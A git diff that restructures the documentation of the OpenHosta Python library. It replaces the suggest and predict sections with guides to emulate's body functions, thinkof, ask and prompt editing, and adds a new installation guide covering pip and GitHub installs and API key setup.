rename from doc/PMAC.md
rename to docs/PMAC.md
diff --git a/doc/Docs.md b/docs/doc.md
similarity index 51%
rename from doc/Docs.md
rename to docs/doc.md
index d026261..e363e28 100644
--- a/doc/Docs.md
+++ b/docs/doc.md
@@ -1,7 +1,7 @@
# Documentation
___
-Documentation for version: **1.2.1
+Documentation for version: **2.0-beta2**
Welcome to **OpenHosta** documentation :). Here you'll find all the **explanations** you need to understand the library, as well as **usage examples** and advanced **configuration** methods for the most complex tasks. You'll also find explanations of the source code for those interested in **contributing** to this project. Check the [Google Colab](https://colab.research.google.com/drive/1XKrPrhLlYJD-ULTA8WHzIMqTXkb3iIpb?usp=sharing) **test files** to help you take your first steps in discovering OpenHosta.
@@ -9,9 +9,9 @@ For this project, we have adopted a [Code of Conduct](CODE_OF_CONDUCT.md) to ens
___
-### Introduction
+## Introduction
-#### First Step
+### First Step
OpenHosta is a **Python library** designed to facilitate the integration of **LLMs** into the developer's environment, by adding a layer to the Python programming language without distorting it. It is based on the [**PMAC**](PMAC.md) concept, reimagining the **compilation** process in languages. All our functionalities respect the **syntax and paradigm** of this language.
@@ -23,7 +23,7 @@ We've already mentioned a few concepts about **AI** or **computer science**. If
Finally, if you like the project and are thinking of contributing, please refer to our [Contribution Guide](CONTRIBUTING.md)
-#### Why use OpenHosta?
+### Why use OpenHosta?
- **Beyond programming**
@@ -39,7 +39,7 @@ We are an Open-Source project. We believe this philosophy contributes to the **s
---
-##### *Legal Framework*
+### *Legal Framework*
The use of AI in a production context raises important **legal** issues. It is essential to take these issues into account to ensure the compliance of your **deployment**.
@@ -60,52 +60,41 @@ For more information, please consult the following links:
Let's **get started**! First here's the **table of contents** to help you navigate through the various sections of the documentation.
-### Table of Content
+## Table of Content
- [Documentation](#documentation)
- - [Introduction](#introduction)
- - [First Step](#first-step)
- - [Why use OpenHosta?](#why-use-openhosta)
- - [*Legal Framework*](#legal-framework)
- - [Table of Content](#table-of-content)
- - [Features](#features)
+ - [Introduction](#introduction)
+ - [First Step](#first-step)
+ - [Why use OpenHosta?](#why-use-openhosta)
+ - [*Legal Framework*](#legal-framework)
+ - [Table of Content](#table-of-content)
+ - [Get Started](#get-started)
- [OpenHosta Example](#openhosta-example)
- - [Get Started](#get-started)
- - [Librairie Import](#librairie-import)
- - [Basic Setup](#basic-setup)
+ - [Install OpenHosta](#install-openhosta)
+ - [Librairie Import](#librairie-import)
+ - [Basic Setup](#basic-setup)
- [`emulate` Function](#emulate-function)
- - [Supported types \& Pydantic](#supported-types--pydantic)
+ - [Supported types \& Pydantic](#supported-types--pydantic)
- [Integration Details](#integration-details)
- - ["suggest" Function](#suggest-function)
- - [Usage](#usage)
- - [Output Examples](#output-examples)
- - [`predict` Function](#predict-function)
- - [How `predict` Works](#how-predict-works)
- - [Limitations and Known Issues](#limitations-and-known-issues)
- - [`predict` Function Parameters](#predict-function-parameters)
- - [Additional `predict` Functionalities](#additional-predict-functionalities)
- - [1. `retrain`](#1-retrain)
- - [Example:](#example)
- - [2. `continue_train`](#2-continue_train)
- - [Example:](#example-1)
- - [3. `emulate`](#3-emulate)
- - [Example:](#example-2)
- - [TrainingSet Management](#trainingset-management)
- - [Example:](#example-3)
- - [Training Output of predict](#training-output-of-predict)
- - [`thought` Function](#thought-function)
- - [`example` Function](#example-function)
- - [Advanced configuration](#advanced-configuration)
- - [Introduction](#introduction-1)
+ - [Body Functions](#body-functions)
+ - [`Example`](#example)
+ - [`Thought`](#thought)
+ - [`thinkof` Function](#thinkof-function)
+ - [`ask` function](#ask-function)
+ - [Advanced configuration](#advanced-configuration)
+ - [Models](#models)
- [Inheriting from the Model Class](#inheriting-from-the-model-class)
- [Custom LLM Call Function](#custom-llm-call-function)
- [Custom Response Handling Function](#custom-response-handling-function)
- [Create a new instance](#create-a-new-instance)
- - [References](#references)
+ - [Prompts](#prompts)
+ - [Edit the prompt](#edit-the-prompt)
+ - [Show me the prompt !](#show-me-the-prompt-)
+ - [References](#references)
---
-## Features
+## Get Started
For each part, you'll find functional examples to illustrate the features. If you have any questions, don't hesitate to visit the “Discussion” tab on GitHub.
@@ -114,8 +103,6 @@ For each part, you'll find functional examples to illustrate the features. If yo
```python
from OpenHosta import emulate, config
-config.set_default_apiKey("put-your-api-key-here")
-
def translate(text:str, language:str)->str:
"""
This function translates the text in the “text” parameter into the language specified in the “language” parameter.
@@ -126,21 +113,22 @@ result = translate("Hello World!", "French")
print(result)
```
-### Get Started
+### Install OpenHosta
+
+The installations process is described step-by-step in the [installation guide](installation.md).
Once you've installed the OpenHosta library, you're ready to get started. We'll import the library and then look at the basic configurations.
-#### Librairie Import
+### Librairie Import
```python
from OpenHosta import *
```
We recommend this import method, as it gives you all the important and stable features:
- - Emulate function
- - Thought function
- - Example function
- - \_\_suggest\_\_ attributes
+ - All the tools to emulate Python function (`emulate` and all it's attached functions)
+ - All the tools to create specialized model (`predict` and all it's attached functions)
+ - All the others features useful in `OpenHosta` (`ask`, `thinkof`, tools for data generation...)
- Configuration tools
But you can also import modules one by one.
@@ -149,19 +137,21 @@ But you can also import modules one by one.
from OpenHosta import emulate, config
```
-#### Basic Setup
+### Basic Setup
This section focuses on the *config* module.
As previously mentioned, a default model is automatically assigned: GPT-4o. To use it, you first need to enter your API key.
+Two methods for that, either you set an environment variable (see the [Installation guide](installation.md)), or you can set it with the following function:
+
```python
config.set_default_apiKey("put-your-api-key-here")
```
Once you've done that, all OpenHosta's features are ready to use.
-If you wish to use another model, you'll need to create an instance of the *Model* class.
+If you want to use another model, you'll need to create an instance of the *Model* class.
```python
my_model = config.Model(
@@ -171,7 +161,7 @@ my_model = config.Model(
)
```
-Note that some features like `thought` or `__suggest__` specifically use the default model. So if you want to change it, use this.
+Note that some features like `thinkof` or `LLMSyntheticDataGenerator` specifically use the default model. So if you want to change it, use this:
```python
config.set_default_model(my_model)
@@ -181,13 +171,16 @@ config.set_default_model(my_model)
The *emulate* function is the main feature of OpenHosta. This is the function that allows you to emulate functions with AI, i.e. the instructions will be executed in an LLM and not directly in your computer. Here's how to use it.
-Emulate is used inside a function or a class method, after the “return”. What it does is take the function's documentation as a “prompt” to emulate it. The way in which you write the function is therefore crucial to ensure that “emulate” works properly.
+Emulate is used inside a function or a class method. What it does is it takes the function's documentation as a “prompt” to emulate it. The way in which you write the function is therefore crucial to ensure that “emulate” works properly.
Here's what you need to know:
- - **The function prototype** is one of the elements sent to LLM. Its different fields must therefore appear clearly. Give a meaningful and precise name to your function. It's also a good idea to specify the type of arguments and the type of return to reduce the uncertainty related to LLM.
-
+ - **The function prototype** is one of the elements sent to LLM. Its different fields must therefore appear clearly. Give a meaningful and precise name to your function. It's also a good idea to annotate your function by specifiing the type of arguments and the type of return. It gives to the LLM the exact format in which it must respond, therefore enhancing it's performance.
+ If you're not familliar with the Python annotation system, please check the [typing module documentation](https://docs.python.org/3/library/typing.html)
+
```python
-def function(a:int, b:dict)->str:
+from typing import List
+
+def example_function(a:int, b:str)->List[str]:
```
- **The doctring** is the other key element. This is where you describe the behavior of the function. Be precise and concise. Describe the input parameters and the nature of the output, as in a docstring. Feel free to try out lots of things, prompt engineering is not a closed science. :)
@@ -215,16 +208,27 @@ def find_name_age(sentence:str, id:dict)->dict:
Note that, as seen above, you can pass a previously configured model as an emulate parameter.
-Be careful, you can put regular instructions in your function and they will be executed. However, `emulate` retrieves all the variables local to the functions and gives them to the LLM as a context.
+Be careful, you can put regular instructions in your function and they will be executed. However, `emulate` can retrieves all the variables local to the functions and gives them to the LLM as a context with the `use_locals_as_ctx` parameter (set at `True`). If your emulated function is a class method, `emulate` can retrieves all the attributes of this class to also give them as context with the `use_self_as_ctx` parameter.
+
+Another parameter of `emulate` is `post_callback`. It take a callable as input and allows you to execute it to the output of the LLM. This can be useful for logging, error handling or formatting multiple emulated function's output with a single function. The callable passed take one argument which is the output of the LLM and must return another value. If the output of the LLM won't change during the execution of your callback, just return the value given in argument.
-emulate also accepts two other arguments: `creativity` and `diversity`. It correspond to the "temperature" and "top_p" parameters of LLMs. These values range from 0 to 1 (inclusive). For more information, please refer to the official [OpenAI documentation](https://openai.com/).
+`emulate` also accepts other unspecified arguments: they correspond to the parameter of the LLM.
+You can find theses in your model's offcial documentation, but here's a few common:
+ - `temperature`
+ - `top_p`
+ - `max_tokens`
+ - (...)
-#### Supported types & Pydantic
+### Supported types & Pydantic
`emulate` support for the **typing** module: You can now use specific return types from the typing module, including [`List`, `Dict`, `Tuple`, `Set`, `FrozenSet`, `Deque`, `Iterable`, `Sequence`, `Mapping`, `Union`, `Optional`, `Literal`].
+> **Note:**
+> Annotate your function's return value as `Optional` tends to make the LLM respond with `None` in case of an inconsistent input. This can become useful when using `OpenHosta` in larger and more complex programm.
+
```python
from OpenHosta import emulate
+from typing import Dict, Tuple, List
def analyze_text(text: str) -> Dict[str, List[Tuple[int, str]]]:
"""Analyze text to map each word to a list of tuples containing word length and word."""
@@ -240,8 +244,6 @@ print(type(analysis))
It also includes a verification output that checks and converts the output to the specified type if necessary. Supported types include **Pydantic** models, all types from the **typing** module mentioned above, as well as built-in types such as `dict`, `int`, `float`, `str`, `list`, `set`, `frozenset`, `tuple`, and `bool`.
The `complex` type is not supported. If you need to use complex numbers, please pass them as a `tuple` and manually convert them after processing.
-For more information about Typing module, please check the official [Typing documentation](https://docs.python.org/3/library/typing.html)
-
OpenHosta integrates with Pydantic, a library for data validation and settings management using Python type annotations. This integration allows you to use Pydantic models directly within `emulate`, ensuring data consistency and validation.
Pydantic provides a way to define data models using Python types. It automatically validates and converts input data to match these types, ensuring that your application processes data safely and accurately.
@@ -257,18 +259,17 @@ OpenHosta supports Pydantic typing by accepting Pydantic models as input of an e
- **Data Parsing:** Converts input data to specified types, simplifying data handling.
The Pydantic model will be automatically processed by our tools and the LLM to guarantee a stable output.
+The Pydantic model cannot be defined inside a function, as this will produce an error.
Let's take the same example, but using this feature:
```python
from pydantic import BaseModel
-from OpenHosta import emulate, config
+from OpenHosta import emulate
class Person(BaseModel):
name: str
age: int
-config.set_default_api_key("put-your-api-key-here")
-
def find_first_name(sentence:str)->Person:
"""
This function find in a text the name and the age of a person.
@@ -283,226 +284,73 @@ def find_first_name(sentence:str)->Person:
return emulate()
```
-Note that the Pydantic model cannot be defined inside a function, as this will produce an error.
-
-### "suggest" Function
+### Body Functions
-When you use the emulate function, an attribute is automatically attached. This attribute is a function giving you hints on how to improve your prompt, and a diagram visualization tool. This tool uses the default model to operate.
+In addition to the docstring-as-prompt, you can enhance your prompting with specialized functions. This way you can try different techniques like Zero/Few-shot prompting or Chain-of-Thought. If you're not familliar with theses concept, please check the [Reference](#references) section.
-#### Usage
+#### `Example`
-Here's how to use it:
+The first of the body function is `example`. It allow you to give example to LLM.
```python
-def find_occurence_of_a_word(word :str, text: str) -> int:
+from OpenHosta import emulate, example
+
+def is_positive(sentence:str)->bool:
"""
- This function takes a word and a text and returns
- the number of times the word appears in the text.
+ This function return True if the sentence in parameter is positive, False otherwise.
"""
+ example(sentence="Marc got a good mark in his exam.", hosta_out=True)
+ example(sentence="The weather is awful today !", hosta_out=False)
return emulate()
-find_occurence_of_a_word("Hello", "Hello World Hello!")
-
-print(suggest(multpily)) # to have the raw message
-print(multiply.diagram) # to have just the diagram
-
-find_occurence_of_a_word.__suggest__(find_occurence_of_a_word) # same
-print(find_occurence_of_a_word.advanced)
-```
+print(is_positive("I can do it !")) # True
-In this example, you can see that after calling the emulated function, we can call `suggest`, which takes as arguments the function object to which it is hooked. After that, we have four new attributes at our disposal:
- - `enhanced prompt`: It's a proposal to improve the function's prompt.
- - `review`: This is the analysis provided by the AI for its prompt improvement. Can be useful to understand its reasoning.
- - `advanced`: Similar to `enhanced prompt` but adds an iteration. The AI will then try to solve advanced problems according to context or other factors. Especially useful in the most complex cases.
- - `diagram`: Gives a Mermaid diagram showing the stages of AI thinking. Useful if you want to try coding the function yourself.
-
-You can also retrieve the entire LLM response by storing the output of the `suggest` function.
-
-Note that this feature uses the default model.
-
-You can also retrieve the entire LLM response by storing the output of the `suggest` function.
-
-Note that this feature uses the default model.
-
-#### Output Examples
-
-- **Enhanced prompt:**
-This function takes two inputs: a word (string) and a text (string). It returns an integer representing the number of times the specified word appears in the given text. The function should be case-insensitive, meaning it should count occurrences of the word regardless of whether it is in uppercase or lowercase. Additionally, the function should handle punctuation properly, ensuring that words followed by punctuation marks are still counted correctly. The function should also include error handling to manage cases where the inputs are not strings or are empty.
-- **Review:**
-The prompt is clear but lacks specificity in handling edge cases and punctuation. It also doesn't specify how to handle different forms of the word, such as plural or possessive forms. Furthermore, it doesn't mention whether the function should count overlapping occurrences of the word. The prompt could benefit from more detailed requirements to ensure robustness and accuracy.
-- **Advanced:**
-This function takes two inputs: a word (string) and a text (string). It returns an integer representing the number of times the specified word appears in the given text. The function should be case-insensitive, meaning it should count occurrences of the word regardless of whether it is in uppercase or lowercase. It should handle punctuation properly, ensuring that words followed by punctuation marks are still counted correctly. The function should not count overlapping occurrences of the word. Additionally, the function should include error handling to manage cases where the inputs are not strings or are empty. It should also handle different forms of the word, such as plural or possessive forms, by considering only exact matches of the word.`
-- **Mermaid diagramm**
-```mermaid
-graph LR
- A[Start] --> B[Receive inputs: word and text]
- B --> C{Are inputs valid?}
- C -- No --> D[Return error]
- C -- Yes --> E[Convert both inputs to lowercase]
- E --> F[Remove punctuation from text]
- F --> G[Split text into words]
- G --> H[Count exact matches of the word]
- H --> I[Return the count]
- I --> J[End]
+# It will be write as follow in the final prompt:
+#######
+# Here are some examples of expected input and output:
+#[{'in_': {'sentence': 'Marc got a good mark in his exam.'}, 'out': True}, {'in_': {'sentence': 'The weather is awful today !'}, 'out': False}]
```
+As shown above, `example` takes two types of argument. There are input parameters which must be named (kwargs) and exactly be the same number and type as in the function's definition. Finally, there's the “hosta_out” parameter. This corresponds to the expected LLM output.
----
-
-## `predict` Function
-
-The `predict` function is the second major feature of OpenHosta, designed to enable the dynamic creation of models for specific functions. While it shares similarities with the `emulate` function, instead of making API calls to a large language model (LLM), `predict` generates an internal model—currently supporting only linear regression.
-
-### How `predict` Works
-
-The `predict` function allows users to train a model automatically by providing a set of training examples. It simplifies model-building by handling the training process directly within a Python function.
-
-At this time, `predict` has a few **limitations** to be aware of:
-
-- **Supported Input Types**: Only `int` and `float` types are allowed as inputs.
-- **Return Type**: The function returns output as a `float`.
-- **Model Type**: Currently, the function builds a simple linear regression model with a single output.
-- **Training Examples**: You must provide at least one example for the model to be trained correctly.
-
-### Limitations and Known Issues
-
-- Since `predict` is still in its Release Candidate (RC) phase, some instability and bugs might occur.
-- If you encounter any issues, please help improve the functionality by reporting them :)
----
+Giving inconsistent examples can severely impact LLM performance. But it can be a very good tool if it's used properly.
+#### `Thought`
-- *Below is a practical example demonstrating how to use `predict` to build a model that estimates a person's chance of dying based on their age*:
+The second body function is `thought`. It allows you to create chain of thought inside your prompt to enhance it's performance for more complex tasks.
```python
-from OpenHosta import predict, example
+from OpenHosta import emulate, thought
+from typing import List, Optional
-def find_chance_of_die(age: float) -> float:
+def car_advice(query:str, car_available:List[str])->Optional[str]:
"""
- This function predicts the chance of dying in a percentage value from 0 to 1,
- based on the age (with the baseline year starting at 1900).
+ This function gives the best advice for the query in parameter. It must return the best car in the list "car_available" fitting the user's needs.
+ If no car fit the user's needs, this function returns None.
"""
- # We forced some interpolation not real data
- example(age=124.0, hosta_out=0.99)
- example(age=100.5, hosta_out=0.20)
- example(age=55.0, hosta_out=0.60)
- example(age=45.0, hosta_out=0.10)
- example(age=24.8, hosta_out=0.20)
- example(age=8.0, hosta_out=0.01)
- return predict()
-
-x = find_chance_of_die(124.0)
-print(x)
-```
-For `example` documentation, please go to this [link](#example-function)
-
-### `predict` Function Parameters
-
-The `predict` function includes several parameters that allow you to fine-tune the model's behavior. Below is a list of these parameters:
-
-- **`epochs` (int)**:
- Defines how many times the model iterates over the training set. Increasing the number of epochs may lead to better model convergence at the cost of longer training times. The default value is 2 times the dataset size, calculated based on the batch size.
-
-- **`complexity` (int)**:
- Sets the level of complexity for the model, which influences the number of weights based on the length of the input. The default value is `5`.
-
-- **`normalization` (bool)**:
- Enables or disables data normalization. When set to `True`, the input data will be normalized based on the `norm_min` and `norm_max` values. The default is `False`.
-
-- **`norm_min` (float)**:
- Defines the minimum value for data normalization. This value helps scale input data to a normalized range. The default is `0.1` for value that are different than 0.
-
-- **`norm_max` (float)**:
- Specifies the maximum value for data normalization. This value sets the upper bound for the normalized range. The default is `1.0`.
-
-- **`verbose` (bool)**:
- Enables or disables verbose output during training. When set to `True`, detailed progress information, including loss values, will be displayed. The default is `False`.
-
-- **`batch_size` (int)**:
- Defines the number of training examples to be used in one iteration. By default, it is set to `5%` of the dataset size or `len(dataset)` if the dataset size is too small for 5%.
-
----
-
-### Additional `predict` Functionalities
-
-The `predict` function also comes with several methods designed to enhance the user experience when building and refining an *Hosta model*. Below are the key methods you can use to interact with and further train your models:
-
-#### 1. `retrain`
-
-The `retrain` method allows you to retrain the model from scratch. It takes several directive parameters:
-
-- **`epochs`**: Specifies the number of training epochs.
-- **`get_loss`**: Defines a target loss for the model to reach during training.
-- **`verbose`**: Displays detailed training information (if set to `True`).
-
-#### Example:
-```python
-find_chance_of_die.retrain(epochs=150, get_loss=0.001, verbose=True)
-```
-
-#### 2. `continue_train`
-
-The `continue_train` method allows you to continue training the model using the current weights, rather than starting from scratch. It also accepts directive parameters:
-
-- **`epochs`**: Specifies how many additional epochs you want to train the model for.
-- **`get_loss`**: Defines a target loss value for the model to reach during continued training.
-- **`verbose`**: Displays training progress information (if set to `True`).
-
-#### Example:
-```python
-find_chance_of_die.continue_train(epochs=150, get_loss=0.001, verbose=True)
-```
-
-#### 3. `emulate`
-
-The `emulate` function makes an API call to a Large Language Model (LLM) to assist in answering predictions made by the `predict` function. For more details, check the documentation of [predict](#predict-function).
-
-#### Example:
-```python
-find_chance_of_die.emulate(124.0)
-```
-
----
-
-
-### TrainingSet Management
-
-The `TrainingSet` feature offers easy tools for managing training datasets in `hosta_injected` functions:
-
-- **`.visualize`**: View the current dataset and its examples.
-- **`.add`**: Add new examples to the dataset.
-
-#### Example:
-
-You can generate and add data to your training set like so:
-
-```python
-
-def cos_plus_sin_generator():
- for i in range(0, 10):
- for j in range(0, 10):
- cos_value = math.cos(i) ** i
- sin_value = math.sin(j) ** j
- training_maths.add(cos=i, sin=j, hosta_out=cos_value + sin_value)
- # Add data to the training set
+ thought("identify the context and the need of the user")
+ thought("Look at the car available to find a car matching his needs")
+ thought("Return the name of the most relevant car, if no car is matching return None")
+ return emulate()
-cos_plus_sin_generator()
-training_maths.visualize() # Visualize the dataset
+car_list = [
+ "Lamborghini Aventador LP700-4",
+ "Volkswagen Coccinelle type 1",
+ "Ford Mustang 2024"
+]
+
+print(car_advice("I lives in the center of a big city with a lot of traffic, what do you recommend ?", car_list))
+# Volkswagen Coccinelle type 1
+print(car_advice("I would two buy a new car, but I would like an electric because I don't want to ruin my planet.", car_list))
+# None
+
+# It will be write as follow in the final prompt:
+#####
+# To solve the request, you have to follow theses intermediate steps. Give only the final result, don't give the result of theses intermediate steps:
+# [{'task': 'identify the context and the need of the user'}, {'task': 'Look at the car available to find a car matching his needs'}, {'task': 'Return the most relevant car, if no car is matching return None'}, {'task': 'identify the context and the need of the user'}, {'task': 'Look at the car available to find a car matching his needs'}, {'task': 'Return the most relevant car, if no car is matching return None'}]
```
-This allows you to both populate and inspect your training data with ease.
-
----
-
-### Training Output of predict
-
-When training the model using `predict`, a corresponding folder will be created under `__hostachache__`. This folder will contain:
-- `config.json`: Configuration file describing model parameters like structure, training data, etc.
-- `model.pth`: The serialized weights of the trained model.
-- `normalization.json`: Values for data normalization to ensure consistent input/output scaling.
-
-These files are used to manage the model, its saved state, and how incoming data will be normalized before being processed.
-
-## `thought` Function
+## `thinkof` Function
**Lambda** functions in Python provide a way to create small, anonymous functions. These are defined using the lambda keyword and can have any number of input parameters but only a single expression.
@@ -513,103 +361,80 @@ These files are used to manage the model, its saved state, and how incoming data
For more information, please check https://python-reference.readthedocs.io/en/latest/docs/operators/lambda.html
-In an aim to integrate with Python syntax, we've developed the `thought` function. It replicates the same behavior as lambda.
+In an aim to integrate with Python syntax, we've developed the `thinkof` function. It replicates the same behavior as lambda.
Here's how it works:
```python
-from OpenHosta import thought
+from OpenHosta import thinkof
-x = thought("Is it a masculine name")
+x = thinkof("Is it a masculine name")
print(x("John")) # True
-result = thought("Multiply by two")(2)
+result = thinkof("Multiply by two")(2)
print(result) # 4
```
-In the example above, we can see two distinct ways of using `thought`. In the first example, you can store a lambda function in a variable and then use it. You can also call it directly by enclosing the arguments behind it in brackets. `thought` accepts multiple arguments and all types native to python. However, the content of the first bracket is always a string.
+In the example above, we can see two distinct ways of using `thinkof`. In the first example, you can store a lambda function in a variable and then use it. You can also call it directly by enclosing the arguments behind it in brackets. `thinkof` accepts multiple arguments and all types native to python. However, the content of the first bracket is always a string.
-The `thought` function has an initial pre-compilation stage where it predicts the type of the return value by making an initial call to an LLM. Execution time can therefore be increased.
+The `thinkof` function has an initial pre-compilation stage where it predicts the type of the return value by making an initial call to an LLM. Execution time can therefore be increased the first time using the function, then the type is stored and reused for the next execution.
You can retrieve the predicted return type with the `_return_type` attribute attached to the object:
```python
-from OpenHosta import thought
+from OpenHosta import thinkof
-x = thought("Adds all integers")
+x = thinkof("Adds all integers")
ret = x(2 ,3 ,6)
print(x._return_type) # int
```
**Note** : ***this feature uses the default model.***
-## `example` Function
+## `ask` function
-The "example" function is designed to enhance the context of a function for a LLM by adding examples to it. This functionality is encapsulated in the `example` function.
-
-**Key Characteristics**
-
-- **Versatile**: The "example" function can be used both inside and outside a function to specify examples.
-- **Save**: The "example" function provides a tool called `save_examples` that can store all the examples added to a specified function in a ***JSONL*** file.
-- **Load**: The function also offers a tool called `load_training_example` to load a file into the context of the function especially for `predict function`.
-
-***Notes : `load_examples` can load `csv`, `json` or `jsonl` file for the moment***
-
-Here's how it works:
+The function `ask` is a sort of a *side* function In OpenHosta. Its only use is to make a simple LLM call without the OpenHosta's meta-prompt. It simplies the process af an API call.
```python
-from OpenHosta import emulate, example
-
-def translate(text:str, language:str)->str:
- """
- This function translates the text in the “text” parameter into the language specified in the “language” parameter.
- """
- example("Bonjour Monde !", "portuguese", hosta_out="ola mundo" )
- return emulate()
-
-
-example(text="Hello World !", language="japanese", hosta_out="こんにちは世界!", hosta_func=translate)
-
-print(translate("Hello World !", "French"))
+from OpenHosta import ask, Model
+
+print(
+ ask(
+ system="You're a helpful assistant."
+ user="Write me a cool story."
+ max_tokens=200
+ )
+)
```
-The `example` function will verify the correlation between the specified input and the parameters of the function. The output should be specified only in the *hosta_out* parameter. If the example are used outside a function, please use the *hosta_func* parameter to specify a function.
-
-Now here's how works `save_examples` and `load_training_example`
+The "traditional" would be like this:
```python
-from OpenHosta import save_examples, load_training_example
-
-save_examples(hosta_func=translate, hosta_path="translate_func_example")
+import openai
-#######
-
-def another_translate(text:str, language:str)->str:
- """
- This function translates the text in the “text” parameter into the language specified in the “language” parameter.
- """
- return emulate()
+openai.api_key = "your-api-key-here"
-load_training_example(hosta_path="translate_func_example.jsonl", hosta_func=another_translate)
-```
+messages = [
+ {"role": "system", "content": "You are a helpful assistant."},
+ {"role": "user", "content": "Write me a cool story."}
+]
-output of the `translate_func_example.jsonl`
+response = openai.ChatCompletion.create(
+ model="gpt-4o",
+ messages=messages
+)
-```JsonL
-{"text": "Hello World !", "language": "japanese", "hosta_out": "こんにちは世界!"}
-{"text": "Bonjour Monde !", "language": "portuguese", "hosta_out": "ola mundo"}
+print(response['choices'][0]['message']['content'])
```
+As seen above takes 2 or more argument. The two first arguments are mandatory. `system` correspond to the system prompt to the LLM, same as the `user` parameter. You can also set the `model` parameter to a custom Model instance. It also handle all LLM parmaters (`max_tokens`, `n`, `top_p`...).
-**Notes**: *All examples provided for a function are stored in a directory at the root of your environment. You can see it as* ***\_\_hostacache__***.
-
-
-
-### Advanced configuration
+**Note** : ***this feature uses the default model.***
+## Advanced configuration
-#### Introduction
+### Models
-This section explains how to customize the program to make its own LLM call and response handling functions. This can be useful if you need a specific functionality that is not provided by the standard library, or to enable compatibility with a specific LLM.
+This section explains how to customize the program to make its own LLM call and response handling functions. This can be useful if you need a specific functionality that is not provided by the standard library, or to enable compatibility with a specific LLM.
#### Inheriting from the Model Class
@@ -714,14 +539,64 @@ ret = x("Hello World")
print(ret)
```
+### Prompts
+
+#### Edit the prompt
+
+`emulate` works by putting the emulated function's parsed data in a meta-prompt designed to give the best performance and ensure a constant ouptput format. But you can different parts of this meta-prompt. Here's how you do it.
+
+You first need to import `EMULATE_PROMPT`
+
+```python
+from OpenHosta import EMULATE_PROMPT
+```
+
+This is an instance of a class conatining attributes. These attributes are all the separated parts (named "shards") of the prompt, that are then combined to build the final prompt. You'll only need to change theses attributes to change automatically the prompt.
+
+Here's all the shards:
+- **CTX_MAIN**: The main context gived to the LLM.
+- **CTX_SEP1**: The separator between the context and the example.
+- **CTX_EXAMPLE**: The examples decribing the overall functioning of OpenHosta.
+- **CTX_SEP2**: The separator between the context and emulated function's infos.
+- **PRE_DEF**: The sentence introducing the function's definition.
+- **PRE_TYPE**: The sentence introducing the function's annotations.
+- **PRE_SCHEMA**: The sentence introducing the function's return type's schema.
+- **PRE_LOCALS**: The sentence introducing the function's local variables (Optional).
+- **PRE_SELF**: The sentence introducing the function's local attributes (Optional).
+- **PRE_EXAMPLE**: The sentence introducing the examples given by the user (Optional).
+- **PRE_COT**: The sentence introducing the Chain-of-Thought (Optional).
+- **USER_SEP**: The separator between the system prompt and the user prompt.
+
+You can find all the separated values by visiting the [meta_prompt.py](../src/OpenHosta/utils/meta_prompt.py) file.
+
+To see te full filled prompt send to the LLM, you can also use the `print_last_prompt` function:
+
+```python
+from OpenHosta import emulate, print_last_prompt
+
+def multiply(a:int, b:int)->int:
+ """
+ This function multiplies two integers in parameter.
+ """
+ return emulate()
+
+multiply(5, 6)
+print_last_prompt(multiply)
+```
+
+#### Show me the prompt !
+
---
-### References
+## References
- **LLM**: https://en.wikipedia.org/wiki/Large_language_model
- **GPT-4o**: https://en.wikipedia.org/wiki/GPT-4o
- **AI**: https://en.wikipedia.org/wiki/Artificial_intelligence
- **NLP**: https://en.wikipedia.org/wiki/Natural_language_processing
+- **Zero-Shot Prompting**: https://www.promptingguide.ai/techniques/zeroshot
+- **Few-Shot Prompting**: https://www.promptingguide.ai/techniques/fewshot
+- **Chain-of-Thought**: https://www.promptingguide.ai/techniques/cot
---
diff --git a/docs/installation.md b/docs/installation.md
new file mode 100644
index 0000000..aa2a67b
--- /dev/null
+++ b/docs/installation.md
@@ -0,0 +1,139 @@
+# Installation
+
+The `OpenHosta` python package contains multiple features which you can install via PyPI or GitHub. However, you may need to install other packages depending on how you use `OpenHosta`. Indeed, some `OpenHosta` features require additional dependencies to be used. You'll also need to set up your API key for easier use.
+All this will be detailed in this document.
+
+## Prerequisites
+
+1. **Python 3.10 | 3.11 | 3.12**
+ - Download and install Python from [python.org](https://www.python.org/downloads/).
+
+2. **pip**
+ - `pip` is generally included with Python. Verify its installation with:
+ ```sh
+ pip --version
+ ```
+
+## OpenHosta Installation
+
+### **Install using `pip`**:
+ 1. Install the package
+ ```sh
+ pip install -U OpenHosta[all]
+ ```
+ 2. Verify installation
+ ```sh
+ pip show OpenHosta
+ ```
+### **Install using `GitHub`**
+ 1. Clone the Git repository:
+
+ ```sh
+ git clone [email protected]:hand-e-fr/OpenHosta.git
+ ```
+
+ 1. Navigate to the directory:
+
+ ```sh
+ cd OpenHosta
+ ```
+
+ 3. Install the package.
+
+ ```sh
+ pip install .[all]
+ ```
+
+ 4. Verify installation
+
+ ```sh
+ python -c "import OpenHosta; print(OpenHosta.__version__)"
+ ```
+
+Installing OpenHosta with GitHub gives you access to all the source code, allowing you to take over the tool and perhaps contribute to the project, but the pip approach is simpler for classic OpenHosta use.
+
+## Additional Dependencies
+
+You can install additional dependencies to use deeper features of `OpenHosta`. You'll need to add the following options.
+
+> **Note**
+> `OpenHosta` base features are "Pure Python". This means that it contains 0 dependencies. It include the `emulate` function and all its related functionalities (`config`, `example`, `thought`), the `thinkof` function and the `ask` function.
+> However, you don't have access to `predict` and the `pydantic` compatibility.
+```sh
+pip install -U OpenHosta # With pip
+```
+*or*
+```sh
+pip install . # With GitHub
+```
+
+### `predict`
+
+Adds the `predict` function and all its features.
+```sh
+pip install -U OpenHosta[predict]
+```
+
+### `pydantic`
+
+Adds the `pydantic` compatibility with all functions.
+```sh
+pip install OpenHosta[pydantic]
+```
+*or*
+```sh
+pip install pydantic # Basically the same
+```
+
+### `dev`
+
+*Not inclued in "all"*
+
+Adds all the useful OpenHosta development tools for those who'd like to contribute.
+```sh
+pip install .[dev] # Useful only with the GitHub install, yon won't need it if you're not interested in contributing for OpenHosta
+```
+
+### `tests`
+
+*Not inclued in "all"*
+
+Adds all the package used for executing the `OpenHosta`'s tests.
+```sh
+pip install .[tests] # Also only useful with the GitHub install
+```
+
+### Combining Options
+
+All options can be combined as needed.
+
+For example, if you're a contributor, it might be useful to install `dev` and `tests` packages:
+```sh
+pip install .[dev, tests]
+```
+Note that the `pydantic` and `predict` packages combined are the same as `all`.
+
+## API Key Setup
+
+1. Get API key from your favorite provider. As default model we use OpenAI `GPT-4o`, you can get a key from https://platform.openai.com/account/api-keys
+2. Then all you have to do is set a environment variable containing this API key:
+ - Windows:
+ ```sh
+ setx OPENAI_API_KEY "your-openai-api-key"
+ ```
+ - MacOS/Linux:
+ ```sh
+ # in your .bashrc or .zshrc
+ export OPENAI_API_KEY='your-anthropic-api-key'
+ ```
+
+## Common Issues
+
